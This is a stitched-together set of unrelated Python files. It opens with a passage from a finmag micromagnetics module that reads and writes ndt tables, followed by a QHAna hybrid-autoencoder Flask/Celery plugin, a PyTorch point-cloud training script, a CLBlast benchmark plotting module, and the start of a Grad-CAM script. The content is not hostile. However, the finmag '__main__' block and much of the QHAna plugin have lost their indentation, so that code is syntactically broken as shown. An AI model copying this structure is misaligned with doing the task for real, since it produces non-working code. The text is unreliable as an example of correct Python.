                                     'header': 'time'})
            self.add_entity('m', {'unit': '<>',
                                  'get': lambda sim: sim.m_average,
                                  'header': ('m_x', 'm_y', 'm_z')})
            # Add time-integrator dummy entries that return NaN as we haven't
            # got the integrator yet (or may never create one); they are
            # replaced later via modify_entity_get_method().
            self.add_entity('steps', {
                'unit': '<1>',
                # 'get': lambda sim: sim.integrator.stats()['nsteps'],
                'get': lambda sim: np.nan,
                'header': 'steps'})
            self.add_entity('last_step_dt', {
                'unit': '<1>',
                # 'get': lambda sim: sim.integrator.stats()['hlast'],
                'get': lambda sim: np.nan,
                'header': 'last_step_dt'})
            self.add_entity('dmdt', {
                'unit': '<A/ms>',
                # 'get': lambda sim: sim.dmdt_max,
                'get': lambda sim: np.array([np.nan, np.nan, np.nan]),
                'header': ('dmdt_x', 'dmdt_y', 'dmdt_z')})
        else:
            self._entities = entities
        self.filename = filename
        self.sim = simulation
        # in what order to write data
        if entity_order:
            self.entity_order = entity_order
        else:
            self.entity_order = self.default_entity_order()
        # if file exists, cowardly stop
        if os.path.exists(filename) and not override:
            msg = "File %s exists already; cowardly stopping" % filename
            raise RuntimeError(msg)

    def add_entity(self, name, dic):
        """
        Add an entity to be saved to this ndt file at the next data saving instance.

        name : a reference name for this entity (used to order the entities in the ndt file)
        dic  : a dictionary with keys 'unit', 'get' and 'header' (see __init__).

        Example (magnetisation):
            name = 'm'
            dic = {'unit': '<>',
                   'get': lambda sim: sim.m_average,
                   'header': ('m_x', 'm_y', 'm_z')}
        """
        if self.save_head:
            # BUG FIX: '+' binds tighter than '.format()', so the original
            # raised a message with raw '{}' placeholders left in. Use
            # implicit string concatenation and format the whole message.
            raise RuntimeError(
                "Attempt to add entity '{}'->'{}' to ndt file {} "
                "after file has been created -- this is impossible".format(
                    name, dic, self.filename))
        assert name not in self._entities.keys(), \
            "Attempt to add a second '{}' to entities for {}".\
            format(name, self.filename)
        # check that right keywords are given
        entity_descr = "entity '{}' -> '{}'".format(name, dic)
        assert 'header' in dic, "Missing 'header' in " + entity_descr
        assert 'unit' in dic, "Missing 'unit' in " + entity_descr
        assert 'get' in dic, "Missing 'get' in " + entity_descr
        self._entities[name] = dic
        self.update_entity_order()

    def modify_entity_get_method(self, name, new_get_method):
        """Allows changing the get method. Is used for integrators at the moment: we register
        dummy get methods when the tablewriter file is created, and then update those if and
        when an integrator has been created."""
        assert name in self._entities, "Couldn't find '{}' in {}".format(
            name, self._entities.keys())
        logger.debug("Updating get method for {} in TableWriter(name={})".format(
            name, self.filename))
        self._entities[name]['get'] = new_get_method

    def delete_entity_get_method(self, name):
        """We cannot delete entities once they are created (as this would change the number
        of columns in the data file). Instead, we register a function that returns numpy.nan.
        """
        assert name in self._entities, "Couldn't find '{}' in {}".format(
            name, self._entities.keys())
        logger.debug("'Deleting' get method for {} in TableWriter(name={})".format(
            name, self.filename))
        self._entities[name]['get'] = lambda sim: np.nan

    def delete_entity_get_methods(self):
        """Method to delete all get_methods.

        Might need this (trying to find references to the simulation objects are hiding).
        """
        logger.debug("'Deleting' all get methods in TableWriter(name={})".format(self.filename))
        # list() so we are not iterating a view of the dict we touch below.
        keys = list(self._entities.keys())
        for key in keys:
            self.delete_entity_get_method(key)

    def default_entity_order(self):
        """Return entity names with 'time' (or 'step') first, rest sorted."""
        # list() so .remove() works regardless of dict.keys() returning a view.
        keys = list(self._entities.keys())
        # time needs to go first
        if 'time' in keys:
            keys.remove('time')
            return ['time'] + sorted(keys)
        elif 'step' in keys:
            keys.remove('step')
            return ['step'] + sorted(keys)
        else:
            return keys

    def update_entity_order(self):
        self.entity_order = self.default_entity_order()

    def headers(self):
        """Return line one and two of the ndt data file as a string."""
        line1 = [self.comment_symbol]
        line2 = [self.comment_symbol]
        for entityname in self.entity_order:
            colheaders = self._entities[entityname]['header']
            # colheaders can be a 3-tuple ('mx','my','mz'), say
            # or a string ('time'). Avoid iterating over string:
            if isinstance(colheaders, str):
                colheaders = [colheaders]
            for colhead in colheaders:
                line1.append(self.string_format % colhead)
                line2.append(self.string_format %
                             self._entities[entityname]['unit'])
        return "".join(line1) + "\n" + "".join(line2) + "\n"

    @timer.method
    def save(self):
        """Append data (spatial averages of fields) for current
        configuration"""
        if not self.save_head:
            # Write the two header lines exactly once, on the first save.
            with open(self.filename, 'w') as f:
                f.write(self.headers())
            self.save_head = True
        # Append one data row.
        with open(self.filename, 'a') as f:
            f.write(' ' * len(self.comment_symbol))  # account for comment
            # symbol width
            for entityname in self.entity_order:
                value = self._entities[entityname]['get'](self.sim)
                if isinstance(value, np.ndarray):
                    for v in value:
                        f.write(self.float_format % v)
                elif isinstance(value, float) or isinstance(value, int):
                    f.write(self.float_format % value)
                elif value is None:
                    # was: isinstance(value, types.NoneType) -- Python-2-only.
                    f.write(self.string_format % "nan")
                else:
                    msg = "Can only deal with numpy arrays, float and int " + \
                          "so far, but type is %s" % type(value)
                    raise NotImplementedError(msg)
            f.write('\n')
class Tablereader(object):
    """Read an ndt data file written by :class:`Tablewriter`.

    The two header lines give column names and units; the remaining lines
    are parsed with numpy and exposed per-column via :meth:`__getitem__`.
    """

    def __init__(self, filename):
        """Open and immediately parse *filename*.

        Raises RuntimeError if the file does not exist.
        """
        self.filename = filename
        # if file is missing, cowardly stop
        if not os.path.exists(filename):
            raise RuntimeError("Cannot see file '%s'" % self.filename)
        # immediately read file
        self.reload()

    def reload(self):
        """(Re-)read the table data file into ``self.datadic``."""
        try:
            self.f = open(self.filename, 'r')
        except IOError:
            raise RuntimeError("Cannot see file '%s'" % self.filename)
        line1 = self.f.readline()
        line2 = self.f.readline()
        headers = line1.split()
        units = line2.split()
        assert len(headers) == len(units)
        # use numpy to read remaining data (genfromtxt will
        # complain if there are rows with different sizes)
        try:
            self.data = np.genfromtxt(self.f)
        except ValueError:
            # BUG FIX: '+' bound tighter than '.format()' in the original, so
            # the message kept its raw '{}' placeholder. Use implicit string
            # concatenation so format() applies to the whole message.
            raise RuntimeError(
                "Cannot load data from file '{}'. "
                "Maybe the file was incompletely written?".format(self.f))
        self.f.close()
        # Make sure we have a 2d array even if the file only contains a single
        # line (or none)
        if self.data.ndim == 1:
            self.data = self.data[np.newaxis, :]
        # Check if the number of data columns is equal to the number of headers
        # (minus one for the leading comment symbol).
        assert self.data.shape[1] == len(headers) - 1
        datadic = {}
        # now wrap up data conveniently
        for i, entity in enumerate(headers[1:]):
            datadic[entity] = self.data[:, i]
        self.datadic = datadic

    def entities(self):
        """Returns list of available entities"""
        return self.datadic.keys()

    def timesteps(self):
        """Returns list of available time steps"""
        return self.datadic['time']

    def __getitem__(self, entity):
        """
        Given the entity name, return the data as a 1D numpy array.

        If multiple entity names (as a tuple) are given then a list of
        arrays is returned, one per entity.
        """
        # str/tuple instead of types.StringType/TupleType: identical on
        # Python 2 (they are aliases) and valid on Python 3.
        if isinstance(entity, str):
            res = self.datadic[entity]
        elif isinstance(entity, tuple):
            res = [self.datadic[e] for e in entity]
        else:
            raise TypeError("'entity' must be a string or a tuple. "
                            "Got: {} ({})".format(entity, type(entity)))
        return res
class FieldSaver(object):
    """
    Wrapper class which can incrementally save data to one file or
    multiple files (depending on the file type). Internally, this
    keeps a counter which is included in the file name if multiple
    files need to be created.

    Supported file types:

       .npy -- Creates multiple, incrementally numbered .npy files.
    """

    # Suffix appended to the basename for each incremental save.
    cnt_pattern = '_{:06d}'

    def __init__(self, filename, overwrite=False, incremental=False):
        """Prepare saving to `filename` (a '.npy' suffix is added if missing).

        overwrite   -- remove pre-existing matching files instead of raising
        incremental -- number output files data_000000.npy, data_000001.npy, ...
        """
        if not filename.endswith('.npy'):
            filename += '.npy'
        # Create any non-existing directory components
        dirname = os.path.dirname(filename)
        if dirname != '' and not os.path.exists(dirname):
            os.makedirs(dirname)
        self.filename = filename
        self.basename, self.ext = os.path.splitext(filename)
        self.incremental = incremental
        self.counter = 0  # included in the file name when incremental
        if incremental:
            existing_files = glob(self.basename + '_*' + self.ext)
        else:
            existing_files = glob(self.filename)
        if len(existing_files) > 0:
            if not overwrite:
                # BUG FIX: the original called .format(self.basename) on a
                # message without a placeholder, silently dropping the name.
                raise IOError(
                    "Will not overwrite existing file(s) '{}*'. Use "
                    "'overwrite=True' if this is what you want.".format(
                        self.basename))
            else:
                logger.debug("Overwriting {} existing file(s) "
                             "'{}*.npy'.".format(len(existing_files), self.basename))
                for f in existing_files:
                    os.remove(f)

    def save(self, data):
        """
        Save the given data (which should be a numpy array).
        """
        if self.incremental:
            cur_filename = self.basename + \
                self.cnt_pattern.format(self.counter) + self.ext
        else:
            cur_filename = self.filename
        logger.debug("Saving field data to file '{}'.".format(cur_filename))
        np.save(cur_filename, data)
        self.counter += 1
def demo2():
    """Demo: schedule periodic ndt saves during a run, then read them back."""
    import finmag
    sim = finmag.example.barmini(name='demo2-fileio')
    sim.save_averages()
    # and write some more data
    sim.schedule("save_ndt", every=10e-12)
    sim.run_until(0.1e-9)
    # read the data
    # NOTE(review): the simulation is named 'demo2-fileio' (hyphen) but the
    # file read back is 'demo2_fileio.ndt' (underscore) -- presumably finmag
    # normalises the name; confirm against finmag's ndt naming convention.
    data = Tablereader('demo2_fileio.ndt')
    for t, mx, my, mz in zip(data['time'], data['m_x'], data['m_y'], data['m_z']):
        print("t={:10g}, m = {:12}, {:12}, {:12}".format(t, mx, my, mz))
def demo1():
    """Demo: drive a small simulation, write an ndt table and read it back."""
    # create example simulation
    import finmag
    import dolfin as df
    xmin, ymin, zmin = 0, 0, 0  # one corner of cuboid
    xmax, ymax, zmax = 6, 6, 11  # other corner of cuboid
    nx, ny, nz = 3, 3, 6  # number of subdivisions (use ~2nm edgelength)
    mesh = df.BoxMesh(df.Point(xmin, ymin, zmin), df.Point(xmax, ymax, zmax), nx, ny, nz)
    # standard Py parameters
    sim = finmag.sim_with(
        mesh, Ms=0.86e6, alpha=0.5, unit_length=1e-9, A=13e-12, m_init=(1, 0, 1))
    filename = 'data.txt'
    ndt = Tablewriter(filename, sim, override=True)
    times = np.linspace(0, 3.0e-11, 6 + 1)
    for i, time in enumerate(times):
        print("In iteration {}, computing up to time {}".format(i, time))
        sim.run_until(time)
        ndt.save()
    # now open file for reading
    f = Tablereader(filename)
    # BUG FIX: these were bare Python-2 print statements, which are a syntax
    # error on Python 3. The parenthesized single-argument form behaves
    # identically under both interpreters.
    print(f.timesteps())
    print(f['m_x'])
if __name__ == "__main__":
print("Demo 1")
demo1()
print("Demo 2")
demo2()
|
# Copyright 2021 QHAna plugin runner contributors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from http import HTTPStatus
from io import StringIO
from json import dumps, loads
from tempfile import SpooledTemporaryFile
from typing import Dict, Mapping, Optional
import marshmallow as ma
from celery.canvas import chain
from celery.result import AsyncResult
from celery.utils.log import get_task_logger
from flask import Response
from flask.app import Flask
from flask.globals import request
from flask.helpers import url_for
from flask.templating import render_template
from flask.views import MethodView
from marshmallow import EXCLUDE
from sqlalchemy.sql.expression import select
from qhana_plugin_runner.api.util import (
FileUrl,
FrontendFormBaseSchema,
MaBaseSchema,
SecurityBlueprint,
)
from qhana_plugin_runner.celery import CELERY
from qhana_plugin_runner.db.db import DB
from qhana_plugin_runner.db.models.tasks import ProcessingTask
from qhana_plugin_runner.requests import open_url
from qhana_plugin_runner.storage import STORE
from qhana_plugin_runner.tasks import save_task_error, save_task_result
from qhana_plugin_runner.util.plugins import QHAnaPluginBase, plugin_identifier
# Plugin name/version and the identifier derived from them (used for the
# blueprint name and for namespacing the celery task names).
_plugin_name = "hybrid-autoencoder"
__version__ = "v0.1.0"
_identifier = plugin_identifier(_plugin_name, __version__)


# Flask blueprint under which all endpoints of this plugin are registered.
HA_BLP = SecurityBlueprint(
    _identifier,
    __name__,
    description="Hybrid Autoencoder plugin API.",
    template_folder="hybrid_ae_templates",
)
class HybridAutoencoderResponseSchema(MaBaseSchema):
    """Serialization schema for the plugin metadata endpoint (dump-only)."""
    name = ma.fields.String(required=True, allow_none=False, dump_only=True)
    version = ma.fields.String(required=True, allow_none=False, dump_only=True)
    identifier = ma.fields.String(required=True, allow_none=False, dump_only=True)
class HybridAutoencoderTaskResponseSchema(MaBaseSchema):
    """Serialization schema for the response returned when a task is started."""
    name = ma.fields.String(required=True, allow_none=False, dump_only=True)
    task_id = ma.fields.String(required=True, allow_none=False, dump_only=True)
    task_result_url = ma.fields.Url(required=True, allow_none=False, dump_only=True)
class HybridAutoencoderPennylaneRequestSchema(FrontendFormBaseSchema):
    """Input schema for the pennylane hybrid autoencoder task (all load-only)."""
    # URL of the CSV input data to embed.
    input_data = FileUrl(
        required=True, allow_none=False, load_only=True, metadata={"label": "Input Data"}
    )
    number_of_qubits = ma.fields.Integer(
        required=True,
        allow_none=False,
        load_only=True,
        metadata={"label": "Number of Qubits"},
    )
    # Target dimensionality of the learned embedding.
    embedding_size = ma.fields.Integer(
        required=True,
        allow_none=False,
        load_only=True,
        metadata={"label": "Embedding Size"},
    )
    # Name of the quantum neural network architecture to use (e.g. as shown
    # in the micro frontend's example values).
    qnn_name = ma.fields.String(
        required=True, allow_none=False, load_only=True, metadata={"label": "QNN Name"}
    )
    training_steps = ma.fields.Integer(
        required=True,
        allow_none=False,
        load_only=True,
        metadata={"label": "Training Steps"},
    )
@HA_BLP.route("/")
class PluginsView(MethodView):
"""Plugins collection resource."""
@HA_BLP.response(HTTPStatus.OK, HybridAutoencoderResponseSchema())
@HA_BLP.require_jwt("jwt", optional=True)
def get(self):
"""Demo endpoint returning the plugin metadata."""
return {
"name": HybridAutoencoderPlugin.instance.name,
"version": HybridAutoencoderPlugin.instance.version,
"identifier": HybridAutoencoderPlugin.instance.identifier,
}
@HA_BLP.route("/ui/")
class MicroFrontend(MethodView):
"""Micro frontend for the hybrid autoencoder plugin."""
example_inputs = {
"inputData": "data:text/plain,0,0,0,0,0,0,0,0,0,0",
"numberOfQubits": 3,
"embeddingSize": 2,
"qnnName": "QNN3",
"trainingSteps": 100,
}
@HA_BLP.html_response(
HTTPStatus.OK, description="Micro frontend of the hybrid autoencoder plugin."
)
@HA_BLP.arguments(
HybridAutoencoderPennylaneRequestSchema(
partial=True, unknown=EXCLUDE, validate_errors_as_result=True
),
location="query",
required=False,
)
@HA_BLP.require_jwt("jwt", optional=True)
def get(self, errors):
"""Return the micro frontend."""
return self.render(request.args, errors)
@HA_BLP.html_response(
HTTPStatus.OK, description="Micro frontend of the hybrid autoencoder plugin."
)
@HA_BLP.arguments(
HybridAutoencoderPennylaneRequestSchema(
partial=True, unknown=EXCLUDE, validate_errors_as_result=True
),
location="form",
required=False,
)
@HA_BLP.require_jwt("jwt", optional=True)
def post(self, errors):
"""Return the micro frontend with prerendered inputs."""
return self.render(request.form, errors)
def render(self, data: Mapping, errors: dict):
print(">>>", errors)
schema = HybridAutoencoderPennylaneRequestSchema()
return Response(
render_template(
"hybrid_ae_template.html",
name=HybridAutoencoderPlugin.instance.name,
version=HybridAutoencoderPlugin.instance.version,
schema=schema,
values=data,
errors=errors,
process=url_for(f"{HA_BLP.name}.HybridAutoencoderPennylaneAPI"),
example_values=url_for(
f"{HA_BLP.name}.MicroFrontend", **self.example_inputs
),
)
)
@HA_BLP.route("/process/pennylane/")
class HybridAutoencoderPennylaneAPI(MethodView):
"""Start a long running processing task."""
@HA_BLP.response(HTTPStatus.OK, HybridAutoencoderTaskResponseSchema)
@HA_BLP.arguments(
HybridAutoencoderPennylaneRequestSchema(unknown=EXCLUDE), location="form"
)
@HA_BLP.require_jwt("jwt", optional=True)
def post(self, req_dict):
"""Start the demo task."""
db_task = ProcessingTask(
task_name=hybrid_autoencoder_pennylane_task.name,
parameters=dumps(req_dict),
)
db_task.save(commit=True)
# all tasks need to know about db id to load the db entry
task: chain = hybrid_autoencoder_pennylane_task.s(
db_id=db_task.id
) | save_task_result.s(db_id=db_task.id)
# save errors to db
task.link_error(save_task_error.s(db_id=db_task.id))
result: AsyncResult = task.apply_async()
db_task.task_id = result.id
db_task.save(commit=True)
return {
"name": hybrid_autoencoder_pennylane_task.name,
"task_id": str(result.id),
"task_result_url": url_for("tasks-api.TaskView", task_id=str(result.id)),
}
class HybridAutoencoderPlugin(QHAnaPluginBase):
    """QHAna plugin wrapper exposing the hybrid autoencoder blueprint."""
    name = _plugin_name
    version = __version__

    def __init__(self, app: Optional[Flask]) -> None:
        super().__init__(app)

    def get_api_blueprint(self):
        """Return the blueprint holding all endpoints of this plugin."""
        return HA_BLP

    def get_requirements(self) -> str:
        """Return extra pip requirements (currently none; see commented URL)."""
        # return "git+ssh://git@github.com/UST-QuAntiL/MuseEmbeddings.git@6cc2f18fdd6b9483d5aaa68d12f8e01cb6329dde#egg=hybrid_autoencoders"
        return ""
TASK_LOGGER = get_task_logger(__name__)


@CELERY.task(
    name=f"{HybridAutoencoderPlugin.instance.identifier}.pennylane_hybrid_autoencoder_task",
    bind=True,
)
def hybrid_autoencoder_pennylane_task(self, db_id: int) -> str:
    """Celery task running the pennylane hybrid autoencoder.

    Loads the parameters stored in the ProcessingTask row `db_id`, streams
    the CSV input from the given URL, runs the autoencoder and persists the
    resulting CSV as the task result. Returns the result CSV as a string.

    Raises KeyError if no task entry exists and ValueError on missing params.
    """
    # Heavy imports are deferred so the web worker does not pay for them.
    import numpy as np
    from hybrid_autoencoders import simple_api

    TASK_LOGGER.info(
        f"Starting new hybrid autoencoder pennylane task with db id '{db_id}'"
    )
    task_data: ProcessingTask = DB.session.execute(
        select(ProcessingTask).filter_by(id=db_id)
    ).scalar_one()
    if task_data is None:
        msg = f"Could not load task data with id {db_id} to read parameters!"
        TASK_LOGGER.error(msg)
        raise KeyError(msg)
    # Parameters were serialized as JSON when the task was created.
    params: Dict = loads(task_data.parameters or "{}")
    input_data_url: str = params.get("input_data", None)
    q_num: int = params.get("number_of_qubits", None)
    embedding_size: int = params.get("embedding_size", None)
    qnn_name: str = params.get("qnn_name", None)
    steps: int = params.get("training_steps", None)
    TASK_LOGGER.info(
        f"input_data: {input_data_url}, q_num: {q_num}, embedding_size: {embedding_size}, qnn_name: {qnn_name}, steps: {steps}"
    )
    if None in [input_data_url, q_num, embedding_size, qnn_name, steps]:
        raise ValueError("Request is missing one or more values.")
    # Stream the CSV input from the URL into a numpy array.
    with open_url(input_data_url, stream=True) as url_data:
        input_data_arr = np.genfromtxt(url_data.iter_lines(), delimiter=",")
    # A single CSV line parses to a 1-d array; reshape to (1, n_features).
    if input_data_arr.ndim == 1:
        input_data_arr = input_data_arr.reshape((1, -1))
    output_arr = simple_api.pennylane_hybrid_autoencoder(
        input_data_arr, q_num, embedding_size, qnn_name, steps
    )
    # Persist the result as a CSV file, then also return it as a string.
    with SpooledTemporaryFile(mode="w") as output:
        np.savetxt(output, output_arr, delimiter=",")
        STORE.persist_task_result(
            db_id, output, "out.csv", "autoencoder-result", "text/csv"
        )
        output.seek(
            0
        )  # TODO remove separate output if task output is already persisted as file
        return "".join(output.readlines())
|
#!/usr/bin/env python
import startup
import pdb
import os
import time
import torch
from torch.utils.tensorboard import SummaryWriter
from models import model_pc_to as model_pc
from run.ShapeRecords import ShapeRecords
from util.app_config import config as app_config
from util.system import setup_environment
#from util.train import get_trainable_variables, get_learning_rate
#from util.losses import regularization_loss
from util.fs import mkdir_if_missing
#from util.data import tf_record_compression
#
# def parse_tf_records(cfg, serialized):
# num_views = cfg.num_views
# image_size = cfg.image_size
#
# # A dictionary from TF-Example keys to tf.FixedLenFeature instance.
# features = {
# 'image': tf.FixedLenFeature([num_views, image_size, image_size, 3], tf.float32),
# 'mask': tf.FixedLenFeature([num_views, image_size, image_size, 1], tf.float32),
# }
#
# if cfg.saved_camera:
# features.update(
# {'extrinsic': tf.FixedLenFeature([num_views, 4, 4], tf.float32),
# 'cam_pos': tf.FixedLenFeature([num_views, 3], tf.float32)})
# if cfg.saved_depth:
# features.update(
# {'depth': tf.FixedLenFeature([num_views, image_size, image_size, 1], tf.float32)})
#
# return tf.parse_single_example(serialized, features)
import numpy as np
def train():
    """Train the point-cloud model on ShapeRecords data.

    Builds the dataset/loader from ``app_config``, optionally restores a
    checkpoint (when the hard-coded ``global_step`` is > 0), then runs the
    optimization loop, periodically writing TensorBoard image/loss summaries
    and saving resumable checkpoints.

    Cleanup performed here: removed large blocks of dead, commented-out
    TensorFlow-era code and the unused per-phase timing locals (they fed only
    commented-out prints).
    """
    cfg = app_config
    setup_environment(cfg)
    device = 'cuda' if torch.cuda.is_available() else 'cpu'
    train_dir = cfg.checkpoint_dir
    mkdir_if_missing(train_dir)

    # Dataset and loader.
    split_name = "train"
    dataset_folder = cfg.inp_dir
    dataset = ShapeRecords(dataset_folder, cfg, split_name)
    dataset_loader = torch.utils.data.DataLoader(
        dataset, batch_size=cfg.batch_size, shuffle=cfg.shuffle_dataset,
        num_workers=4, drop_last=True)

    summary_writer = SummaryWriter(log_dir=train_dir, flush_secs=10)
    ckpt_count = 1000     # save a checkpoint every N steps
    summary_count = 100   # write image/loss summaries every N steps

    # Create the model.
    model = model_pc.ModelPointCloud(cfg)
    model = model.to(device)
    print(model.parameters)

    # NOTE(review): log_dir and the resume step are hard-coded; consider
    # moving them into the config.
    log_dir = '../../dpc/run/model_run_data_lamp/'
    mkdir_if_missing(log_dir)
    learning_rate = 1e-4
    optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate,
                                 weight_decay=cfg.weight_decay)

    # Resume from an existing checkpoint when global_step > 0, else start fresh.
    global_step = 38000
    if global_step > 0:
        checkpoint_path = os.path.join(log_dir, 'model.ckpt_{}.pth'.format(global_step))
        print("Loading from path:", checkpoint_path)
        checkpoint = torch.load(checkpoint_path)
        global_step_val = checkpoint['global_step']
        model.load_state_dict(checkpoint['model_state_dict'])
        optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
    else:
        global_step_val = global_step

    model.train()
    while global_step_val < cfg.max_number_of_steps:
        step_loss = 0.0
        for i, train_data in enumerate(dataset_loader, 0):
            t_start = time.perf_counter()
            # Move every tensor in the batch to the target device; non-tensor
            # entries (no .to attribute) are left untouched.
            for k in train_data.keys():
                try:
                    train_data[k] = train_data[k].to(device)
                except AttributeError:
                    pass
            inputs = model.preprocess(train_data, cfg.step_size)
            optimizer.zero_grad()
            if global_step_val % summary_count == 0:
                # Summary step: also log predicted/actual projection images.
                outputs = model(inputs, global_step_val, is_training=True,
                                run_projection=True, summary_writer=summary_writer)
                loss, min_loss = model.get_loss(inputs, outputs, summary_writer,
                                                add_summary=True,
                                                global_step=global_step_val)
                summary_writer.add_image(
                    'prediction',
                    outputs['projs'].detach().cpu().numpy()[min_loss[0]].transpose(2, 0, 1),
                    global_step_val)
                summary_writer.add_image(
                    'actual',
                    inputs['masks'].detach().cpu().numpy()[0].transpose(2, 0, 1),
                    global_step_val)
            else:
                outputs = model(inputs, global_step_val, is_training=True, run_projection=True)
                loss, _ = model.get_loss(inputs, outputs, add_summary=False)
            loss.backward()
            optimizer.step()
            # Free the (potentially large) intermediate tensors before logging.
            del inputs
            del outputs
            dt = time.perf_counter() - t_start
            step_loss += loss.item()
            loss_avg = step_loss / (i + 1)
            print(f"step: {global_step_val}, loss= {loss.item():.5f}, loss_average = {loss_avg:.4f} ({dt:.3f} sec/step)")
            if global_step_val % ckpt_count == 0:
                # Persist model/optimizer state so training can be resumed.
                checkpoint_path = os.path.join(log_dir, 'model.ckpt_{}.pth'.format(global_step_val))
                print("PATH:", checkpoint_path)
                torch.save({
                    'global_step': global_step_val,
                    'model_state_dict': model.state_dict(),
                    'optimizer_state_dict': optimizer.state_dict(),
                    'loss': loss_avg
                }, checkpoint_path)
            global_step_val += 1
def main(_=None):
    """Script entry point; runs training.

    BUG FIX: the ``__main__`` guard below calls ``main()`` with no arguments,
    but the parameter (kept from the ``tf.app.run(main)`` convention of
    passing argv) was required — the original raised
    ``TypeError: main() missing 1 required positional argument``. Giving it a
    default is backward compatible with callers that do pass an argument.
    """
    train()


if __name__ == '__main__':
    main()
|
# This file is part of the CLBlast project. The project is licensed under Apache Version 2.0. This file follows the
# PEP8 Python style guide and uses a max-width of 120 characters per line.
#
# Author(s):
# <NAME> <www.cedricnugteren.nl>
import utils
import matplotlib
matplotlib.use('Agg')
from matplotlib import rcParams
import matplotlib.pyplot as plt
# Colors
def _rgb(red, green, blue):
    """Convert 8-bit RGB components to matplotlib's 0-1 float range."""
    return [red / 255.0, green / 255.0, blue / 255.0]


BLUEISH = _rgb(71, 101, 177)   # #4765b1
REDISH = _rgb(214, 117, 104)   # #d67568
PURPLISH = _rgb(85, 0, 119)    # #550077
GREEN = _rgb(144, 224, 98)     # #90e062
# Default per-series colors and line markers used when no explicit
# label-based override applies in plot_graphs.
COLORS = [BLUEISH, REDISH, PURPLISH, GREEN]
MARKERS = ["o-", "x-", ".-"]
def plot_graphs(results, file_name, num_rows, num_cols,
                x_keys, y_keys, titles, x_labels, y_labels,
                label_names, title, tight_plot, verbose):
    """Plot a grid of benchmark-result subplots and save the figure to disk.

    Args:
        results: One list of result dicts per subplot (num_rows * num_cols lists).
        file_name: Output image path passed to ``fig.savefig``.
        num_rows, num_cols: Grid dimensions.
        x_keys, y_keys: Per-subplot lists of result-dict keys to plot.
        titles, x_labels, y_labels: Per-subplot title/axis-label strings.
        label_names: One legend entry per y-key (shared across subplots).
        title: Figure-level super-title.
        tight_plot: Compact layout for papers/presentations when True.
        verbose: Unused here; kept for interface compatibility.
    """
    assert len(results) == num_rows * num_cols
    assert len(results) != 1
    assert len(x_keys) == len(results)
    assert len(y_keys) == len(results)
    assert len(titles) == len(results)
    assert len(x_labels) == len(results)
    assert len(y_labels) == len(results)

    # Tight plot (for in a paper or presentation) or regular (for display on a screen)
    if tight_plot:
        plot_size = 5
        w_space = 0.20
        h_space = 0.39
        title_from_top = 0.11
        legend_from_top = 0.17
        legend_from_top_per_item = 0.04
        x_label_from_bottom = 0.09
        legend_spacing = 0.0
        font_size = 15
        font_size_legend = 13
        font_size_title = font_size
        bounding_box = "tight"
    else:
        plot_size = 8
        w_space = 0.15
        h_space = 0.22
        title_from_top = 0.09
        legend_from_top = 0.10
        legend_from_top_per_item = 0.07
        x_label_from_bottom = 0.06
        legend_spacing = 0.8
        font_size = 15
        font_size_legend = font_size
        font_size_title = 18
        bounding_box = None  # means not 'tight'

    # Initializes the plot
    size_x = plot_size * num_cols
    size_y = plot_size * num_rows
    rcParams.update({'font.size': font_size})
    fig, axes = plt.subplots(nrows=num_rows, ncols=num_cols, figsize=(size_x, size_y), facecolor='w', edgecolor='k')
    fig.text(.5, 0.92, title, horizontalalignment="center", fontsize=font_size_title)
    plt.subplots_adjust(wspace=w_space, hspace=h_space)

    # Loops over each subplot
    for row in range(num_rows):
        for col in range(num_cols):
            index = row * num_cols + col
            result = results[index]
            ax = axes.flat[index]
            plt.sca(ax)
            print("[plot] Plotting subplot %d" % index)

            # Sets the x-axis labels
            x_list = [[r[x_key] for r in result] for x_key in x_keys[index]]
            x_ticks = [",".join([utils.float_to_kilo_mega(v) for v in values]) for values in zip(*x_list)]
            x_location = range(len(x_ticks))

            # Optional sparsifying of the labels on the x-axis
            if tight_plot and len(x_location) > 10:
                x_ticks = [v if not (i % 2) else "" for i, v in enumerate(x_ticks)]

            # Sets the y-data (missing keys plot as 0)
            y_list = [[r[y_key] if y_key in r.keys() else 0 for r in result] for y_key in y_keys[index]]
            y_max = [max(y) if len(y) else 1 for y in y_list]
            y_max = max(y_max) if len(y_list) > 0 else 1

            # Sets the axes: round the y-limit up to a "nice" boundary.
            y_rounding = 10 if y_max < 80 else 50 if y_max < 400 else 200
            y_axis_limit = (y_max * 1.2) - ((y_max * 1.2) % y_rounding) + y_rounding
            # BUG FIX: the `ymin`/`ymax` keyword aliases were removed from
            # matplotlib (3.3+); positional arguments work on all versions.
            plt.ylim(0, y_axis_limit)
            plt.xticks(x_location, x_ticks, rotation='vertical')

            # Sets the labels
            ax.set_title(titles[index], y=1.0 - title_from_top, fontsize=font_size)
            if col == 0 or y_labels[index] != y_labels[index - 1]:
                ax.set_ylabel(y_labels[index])
            ax.set_xlabel(x_labels[index])
            ax.xaxis.set_label_coords(0.5, x_label_from_bottom)

            # Plots the graph
            assert len(COLORS) >= len(y_keys[index])
            assert len(MARKERS) >= len(y_keys[index])
            assert len(label_names) == len(y_keys[index])
            for i in range(len(y_keys[index])):
                # Fixed color/marker for well-known library labels; otherwise
                # fall back to the positional defaults.
                color = COLORS[i]
                marker = MARKERS[i]
                if label_names[i] in ["CLBlast", "CLBlast FP32"]:
                    color = BLUEISH
                    marker = "o-"
                elif label_names[i] in ["CLBlast FP16"]:
                    color = PURPLISH
                    marker = ".-"
                elif label_names[i] in ["clBLAS", "clBLAS FP32", "clBLAS (non-batched)"]:
                    color = REDISH
                    marker = "x-"
                elif label_names[i] in ["cuBLAS", "cuBLAS (non-batched)"]:
                    color = GREEN
                    marker = ".-"
                ax.plot(x_location, y_list[i], marker, label=label_names[i], color=color)

            # Sets the legend
            leg = ax.legend(loc=(0.02, 1.0 - legend_from_top - legend_from_top_per_item * len(y_keys[index])),
                            handletextpad=0.1, labelspacing=legend_spacing, fontsize=font_size_legend)
            leg.draw_frame(False)

    # Saves the plot to disk
    print("[benchmark] Saving plot to '" + file_name + "'")
    fig.savefig(file_name, bbox_inches=bounding_box)
|
"""
Gradcam visualization ref modified from implementation by fchollet (https://keras.io/examples/vision/grad_cam)
"""
import cv2
import numpy as np
import os
import sys
import argparse
